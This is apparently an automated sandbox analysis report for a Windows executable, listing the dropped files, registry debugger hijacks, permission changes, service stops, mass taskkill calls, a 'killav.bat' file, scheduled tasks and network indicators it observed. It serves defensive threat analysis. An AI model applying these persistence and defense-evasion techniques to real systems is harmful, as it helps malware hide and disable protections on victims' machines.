6e83d9e27d565709d8ee5980ff30cd4db9f0ffaf57ff81fdcca468556e189ad2

Analysis

max time kernel
118s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2022 23:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

74161da72b92f3dc29efa72b75dcf86c.exe
Size

19.9MB
MD5

74161da72b92f3dc29efa72b75dcf86c
SHA1

8490c1331b1c40ce986306d5dda51670f93fd78c
SHA256

6e83d9e27d565709d8ee5980ff30cd4db9f0ffaf57ff81fdcca468556e189ad2
SHA512

ced5b9e9358e9ebeed90d1f65fa994adcc55efb3ec9de1e382e671bd584777733ade7bb309031674797d68b8338cd79873a3e467a831ade9fb8159be96b58c5f
SSDEEP

393216:Dowc0wiNiY5FZqOlRQKihdkdByFFCEJnBdTikjkDAWIjoS1SpyEeqBAClYljKAgA:pXbeOyFFCYBdTikgcWxS1OdeqGCluCAF

Score

8^/10

discovery evasion exploit persistence upx

Malware Config

Signatures

Executes dropped EXE 11 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exePrimaryScreen.exeAIOC4.exePrimaryScreen.exeAIOC4.exePrimaryScreen.exeAIOC4.exearia2c.exes_a.exe

pid	process
3616	StartNetApp.exe
3200	s_a.exe
4548	AIOC4.exe
4776	PrimaryScreen.exe
1568	AIOC4.exe
1376	PrimaryScreen.exe
492	AIOC4.exe
804	PrimaryScreen.exe
3544	AIOC4.exe
1008	aria2c.exe
3012	s_a.exe

Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5224 takeown.exe
1260 icacls.exe
5724 takeown.exe
5288 icacls.exe

pid	process
5224	takeown.exe
1260	icacls.exe
5724	takeown.exe
5288	icacls.exe

Sets file execution options in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

AIOC4.exeStartNetApp.exeAIOC4.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUCN.exe	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUCN.exe\Debugger = "C:\\Program Files\\AIOC4\\AIOC4.exe"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AIOC4.exe	StartNetApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutodeskInstallOnlineCheck3.exe	StartNetApp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AIOC4.exe\dpiAwareness = "1"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AU_CN.exe	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AU_CN.exe\Debugger = "C:\\Program Files\\AIOC4\\AIOC4.exe"	AIOC4.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Program Files\AIOC4\StartNetApp.exe	upx
C:\Program Files\AIOC4\StartNetApp.exe	upx
behavioral2/memory/3616-135-0x0000000000400000-0x000000000055A000-memory.dmp	upx

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

StartNetApp.exeAIOC4.exeAIOC4.exeAIOC4.exeAIOC4.exe74161da72b92f3dc29efa72b75dcf86c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	StartNetApp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AIOC4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AIOC4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AIOC4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AIOC4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	74161da72b92f3dc29efa72b75dcf86c.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5724 takeown.exe
5288 icacls.exe
5224 takeown.exe
1260 icacls.exe
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 61.160.195.64
Destination IP 114.114.114.114
Destination IP 114.114.114.114

pid	process
5724	takeown.exe
5288	icacls.exe
5224	takeown.exe
1260	icacls.exe

description	ioc
Destination IP	61.160.195.64
Destination IP	114.114.114.114
Destination IP	114.114.114.114

Drops file in Program Files directory 64 IoCs

Processes:

74161da72b92f3dc29efa72b75dcf86c.exe

description	ioc	process
File opened for modification	C:\Program Files\AIOC4\msi_x86.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\SetACL.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x64\aria2.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Microsoft.VisualBasic.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Robocopy_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\taskkill_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x86\7z.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\task.txt	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\PrimaryScreen.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\DemoControls.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x64\aria2.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x86\dht.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x86\7z.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x64\dht6.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x86	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x86\aria2.conf	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\StartNetApp.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x86\dht6.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\srv.txt	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\SetACL64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x64\dht.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x86\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.session	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Language\zh-CN	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x64\7z.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Robocopy_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\SetACL.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\PrimaryScreen.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.conf	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\Maya2015英文版.lnk	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\icacls_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x86\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Language\801A048D8E177F0C7D7B71C4336E985F\zh-CN.ini	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x64	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.conf	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\attrib_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\xcopy_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\killav.bat	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\CSkin.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\certmgr_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x64\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x86\aria2c.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Language	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\xcopy_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x64\dht.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\icacls_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Language\en-US\OSSetupError.ini	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Language\zh-CN\OSSetupError.ini	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\StartNetApp.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x86\dht6.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x64\dht6.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x64\aria2c.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x86\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x64\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x64\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Language\zh-CN\OSSetupError.ini	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\aria2\AriaNg.url	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x64	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\ICSharpCode.SharpZipLib.dll	74161da72b92f3dc29efa72b75dcf86c.exe

Launches sc.exe 32 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5224	sc.exe
1532	sc.exe
5700	sc.exe
5800	sc.exe
4076	sc.exe
5780	sc.exe
4992	sc.exe
6028	sc.exe
6016	sc.exe
1172	sc.exe
5680	sc.exe
1596	sc.exe
2180	sc.exe
3660	sc.exe
1324	sc.exe
3988	sc.exe
5216	sc.exe
5280	sc.exe
5024	sc.exe
4164	sc.exe
4916	sc.exe
1184	sc.exe
4760	sc.exe
3160	sc.exe
5824	sc.exe
5740	sc.exe
5720	sc.exe
5084	sc.exe
3172	sc.exe
2232	sc.exe
1260	sc.exe
6128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3580 schtasks.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2328 tasklist.exe
2224 tasklist.exe
6072 tasklist.exe

pid	process
3580	schtasks.exe

pid	process
2328	tasklist.exe
2224	tasklist.exe
6072	tasklist.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1364	taskkill.exe
2280	taskkill.exe
5640	taskkill.exe
5624	taskkill.exe
5260	taskkill.exe
2320	taskkill.exe
5920	taskkill.exe
2412	taskkill.exe
5188	taskkill.exe
5140	taskkill.exe
4072	taskkill.exe
5360	taskkill.exe
5760	taskkill.exe
5448	taskkill.exe
5660	taskkill.exe
5036	taskkill.exe
3172	taskkill.exe
5924	taskkill.exe
4408	taskkill.exe
5348	taskkill.exe
5156	taskkill.exe
4760	taskkill.exe
5704	taskkill.exe
4356	taskkill.exe
3724	taskkill.exe
5452	taskkill.exe
5696	taskkill.exe
2972	taskkill.exe
4168	taskkill.exe
6088	taskkill.exe
5936	taskkill.exe
4840	taskkill.exe
6128	taskkill.exe
4456	taskkill.exe
5752	taskkill.exe
4608	taskkill.exe
4304	taskkill.exe
5336	taskkill.exe
2300	taskkill.exe
488	taskkill.exe
2884	taskkill.exe
4984	taskkill.exe
5416	taskkill.exe
5864	taskkill.exe
4196	taskkill.exe
2192	taskkill.exe
5412	taskkill.exe
4248	taskkill.exe
5988	taskkill.exe
5132	taskkill.exe
4576	taskkill.exe
5968	taskkill.exe
5004	taskkill.exe
5432	taskkill.exe
4884	taskkill.exe
2288	taskkill.exe
5860	taskkill.exe
5548	taskkill.exe
5432	taskkill.exe
2196	taskkill.exe
5300	taskkill.exe
5908	taskkill.exe
4984	taskkill.exe
2296	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 13 IoCs

adware spyware

Modify Registry

T1112

Processes:

StartNetApp.exeAIOC4.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\StartNetApp.exe = "11001"	StartNetApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	StartNetApp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\AIOC4.exe = "11001"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\AIOC4.exe = "11001"
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

5984 PING.EXE
3964 PING.EXE
5760 PING.EXE
5576 PING.EXE
1248 PING.EXE
5204 PING.EXE
5276 PING.EXE

pid	process
5984	PING.EXE
3964	PING.EXE
5760	PING.EXE
5576	PING.EXE
1248	PING.EXE
5204	PING.EXE
5276	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exe

pid	process
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3200	s_a.exe
4548	AIOC4.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3616	StartNetApp.exe
3616	StartNetApp.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe
4548	AIOC4.exe
4548	AIOC4.exe
3200	s_a.exe
3200	s_a.exe
4548	AIOC4.exe
4548	AIOC4.exe
3200	s_a.exe
3200	s_a.exe
4548	AIOC4.exe
4548	AIOC4.exe
3200	s_a.exe
3200	s_a.exe
3200	s_a.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

AIOC4.exeAIOC4.exeAIOC4.exe

pid process

4548 AIOC4.exe
1568
492 AIOC4.exe
3544 AIOC4.exe

pid	process
4548	AIOC4.exe
1568
492	AIOC4.exe
3544	AIOC4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exeAIOC4.exeAIOC4.exeAIOC4.execmd.exes_a.execmd.exeConhost.exeWMIC.exetaskkill.exeNSudoLG.execmd.exe

description	pid	process
Token: SeDebugPrivilege	3616	StartNetApp.exe
Token: SeDebugPrivilege	3200	s_a.exe
Token: SeDebugPrivilege	4548	AIOC4.exe
Token: SeDebugPrivilege	1568	AIOC4.exe
Token: SeDebugPrivilege	492	AIOC4.exe
Token: SeDebugPrivilege	3544	AIOC4.exe
Token: SeDebugPrivilege	2328	cmd.exe
Token: SeDebugPrivilege	3012	s_a.exe
Token: SeDebugPrivilege	4464	cmd.exe
Token: SeDebugPrivilege	4576	Conhost.exe
Token: SeIncreaseQuotaPrivilege	4836	WMIC.exe
Token: SeSecurityPrivilege	4836	WMIC.exe
Token: SeTakeOwnershipPrivilege	4836	WMIC.exe
Token: SeLoadDriverPrivilege	4836	WMIC.exe
Token: SeSystemProfilePrivilege	4836	WMIC.exe
Token: SeSystemtimePrivilege	4836	WMIC.exe
Token: SeProfSingleProcessPrivilege	4836	WMIC.exe
Token: SeIncBasePriorityPrivilege	4836	WMIC.exe
Token: SeCreatePagefilePrivilege	4836	WMIC.exe
Token: SeBackupPrivilege	4836	WMIC.exe
Token: SeRestorePrivilege	4836	WMIC.exe
Token: SeShutdownPrivilege	4836	WMIC.exe
Token: SeDebugPrivilege	4836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4836	WMIC.exe
Token: SeRemoteShutdownPrivilege	4836	WMIC.exe
Token: SeUndockPrivilege	4836	WMIC.exe
Token: SeManageVolumePrivilege	4836	WMIC.exe
Token: 33	4836	WMIC.exe
Token: 34	4836	WMIC.exe
Token: 35	4836	WMIC.exe
Token: 36	4836	WMIC.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4836	WMIC.exe
Token: SeSecurityPrivilege	4836	WMIC.exe
Token: SeTakeOwnershipPrivilege	4836	WMIC.exe
Token: SeLoadDriverPrivilege	4836	WMIC.exe
Token: SeSystemProfilePrivilege	4836	WMIC.exe
Token: SeSystemtimePrivilege	4836	WMIC.exe
Token: SeProfSingleProcessPrivilege	4836	WMIC.exe
Token: SeIncBasePriorityPrivilege	4836	WMIC.exe
Token: SeCreatePagefilePrivilege	4836	WMIC.exe
Token: SeBackupPrivilege	4836	WMIC.exe
Token: SeRestorePrivilege	4836	WMIC.exe
Token: SeShutdownPrivilege	4836	WMIC.exe
Token: SeDebugPrivilege	4836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4836	WMIC.exe
Token: SeRemoteShutdownPrivilege	4836	WMIC.exe
Token: SeUndockPrivilege	4836	WMIC.exe
Token: SeManageVolumePrivilege	4836	WMIC.exe
Token: 33	4836	WMIC.exe
Token: 34	4836	WMIC.exe
Token: 35	4836	WMIC.exe
Token: 36	4836	WMIC.exe
Token: SeDebugPrivilege	1192	NSudoLG.exe
Token: SeIncreaseQuotaPrivilege	4144	cmd.exe
Token: SeSecurityPrivilege	4144	cmd.exe
Token: SeTakeOwnershipPrivilege	4144	cmd.exe
Token: SeLoadDriverPrivilege	4144	cmd.exe
Token: SeSystemProfilePrivilege	4144	cmd.exe
Token: SeSystemtimePrivilege	4144	cmd.exe
Token: SeProfSingleProcessPrivilege	4144	cmd.exe
Token: SeIncBasePriorityPrivilege	4144	cmd.exe
Token: SeCreatePagefilePrivilege	4144	cmd.exe
Token: SeBackupPrivilege	4144	cmd.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

StartNetApp.exeAIOC4.exearia2c.exe

pid process

3616 StartNetApp.exe
492 AIOC4.exe
492 AIOC4.exe
1008 aria2c.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

74161da72b92f3dc29efa72b75dcf86c.exeStartNetApp.exeAIOC4.exe

description	pid	process	target process
PID 4728 wrote to memory of 3616	4728	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 4728 wrote to memory of 3616	4728	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 4728 wrote to memory of 3616	4728	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 3616 wrote to memory of 3200	3616	StartNetApp.exe	s_a.exe
PID 3616 wrote to memory of 3200	3616	StartNetApp.exe	s_a.exe
PID 3616 wrote to memory of 4548	3616	StartNetApp.exe	AIOC4.exe
PID 3616 wrote to memory of 4548	3616	StartNetApp.exe	AIOC4.exe
PID 4548 wrote to memory of 2900	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2900	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4544	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4544	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3536	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3536	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4868	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4868	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2488	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2488	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1648	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1648	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 868	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 868	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1956	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1956	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1480	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1480	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4952	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4952	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3276	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3276	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2596	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2596	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4804	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4804	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4576	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4576	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3460	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3460	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1820	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1820	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4924	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4924	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1244	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1244	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4856	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4856	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1576	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1576	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2984	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 2984	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1252	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 1252	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3396	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3396	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4712	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 4712	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3364	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3364	4548	AIOC4.exe	cmd.exe
PID 4548 wrote to memory of 3648	4548	AIOC4.exe	cmd.exe
